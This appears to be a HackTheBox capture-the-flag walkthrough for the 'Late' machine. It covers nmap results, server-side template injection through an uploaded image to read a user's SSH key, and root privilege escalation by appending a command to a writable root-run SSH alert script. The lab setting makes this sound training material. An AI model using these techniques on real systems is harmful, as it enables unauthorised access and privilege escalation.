Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 23 Apr 2022
IP: 10.10.11.156

HackTheBox’s Late is an easy level machine.

Enumeration

nmap scanning result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.92 scan initiated Mon Apr 25 12:18:35 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.156
Nmap scan report for 10.10.11.156
Host is up, received echo-reply ttl 63 (0.048s latency).
Scanned at 2022-04-25 12:18:36 UTC for 12s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSqIcUZeMzG+QAl/4uYzsU98davIPkVzDmzTPOmMONUsYleBjGVwAyLHsZHhgsJqM9lmxXkb8hT4ZTTa1azg4JsLwX1xKa8m+RnXwJ1DibEMNAO0vzaEBMsOOhFRwm5IcoDR0gOONsYYfz18pafMpaocitjw8mURa+YeY21EpF6cKSOCjkVWa6yB+GT8mOcTZOZStRXYosrOqz5w7hG+20RY8OYwBXJ2Ags6HJz3sqsyT80FMoHeGAUmu+LUJnyrW5foozKgxXhyOPszMvqosbrcrsG3ic3yhjSYKWCJO/Oxc76WUdUAlcGxbtD9U5jL+LY2ZCOPva1+/kznK8FhQN
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBMen7Mjv8J63UQbISZ3Yju+a8dgXFwVLgKeTxgRc7W+k33OZaOqWBctKs8hIbaOehzMRsU7ugP6zIvYb25Kylw=
|   256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIGrWbMoMH87K09rDrkUvPUJ/ZpNAwHiUB66a/FKHWrj
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 25 12:18:48 2022 -- 1 IP address (1 host up) scanned in 12.91 seconds

Foothold

lets open the webpage in browser.

Then, place images.late.htb in the /etc/hosts file.

Let’s go to imges.late.htb in the browser.

You can also see that it was created with flask, that also indicates that it could be vulnerable to SSTI injection.

The images are converted into text by the application. So, let’s use a editor then take screenshot like below.

Here’s an example of a payload image.

Upload the image into the application.

After uploaded the image payload. We will get result.txt file automatically with executed payload’s answer. We confirmed that this application is vulnerable to SSTI.

User Flag

so we can exploit the SSTI by calling os.popen().read()

Here’s an example of a payload.

Successfully executed.

I’m attempting to obtain the svc acc user’s ssh key.

Here is the payload for obtaining the user’s ssh key.

We have the user ssh key.

Save the key as svc acc key in a file.

1
chmod 600 svc_acc_key
1
2
3
4
ssh -i svc_acc_key svc_acc@late.htb
svc_acc@late:~$ cat user.txt
49a7b4001ac25b6969a8cff2af9xxxxx
svc_acc@late:~$

Got User Flag.

Root Flag

Nothing appears to be interesting or suspicious after running the linpeas.sh script.

I discovered something interesting after monitoring the running process.

2022/05/08 09:14:02 CMD: UID=0 PID=25096 | cp /root/scripts/ssh-alert.sh /usr/local/sbin/ssh-alert.sh

2022/05/08 09:14:02 CMD: UID=0 PID=25093 | /bin/bash /root/scripts/cron.sh

2022/05/08 09:14:02 CMD: UID=0 PID=25092 | /bin/sh -c /root/scripts/cron.sh

2022/05/08 09:14:02 CMD: UID=0 PID=25091 | /usr/sbin/CRON -f

Analyze the /usr/local/sbin/ssh-alert.sh script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
svc_acc@late:/tmp$ cat /usr/local/sbin/ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

Every time we ssh into a machine, it sends an email to root with the username, date, and server name of the person who is accessing the machine.

We can take advantage of this to execute commands as root.

I attempted to modify the entire script but was unable to do so.

As a result, I only append the command.

1
echo "cat /root/root.txt > /tmp/root.txt;chown svc_acc:svc_acc /tmp/root.txt" >> /usr/local/sbin/ssh-alert.sh

After that, SSH into the user. Our modified script was run as root.

1
2
3
4
ssh -i svc_acc_key svc_acc@late.htb
svc_acc@late:~$ cat /tmp/root.txt 
6edb2bd94bb6168c9943e2d77adxxxxx
svc_acc@late:~$

Boom…. Got RoOt Flag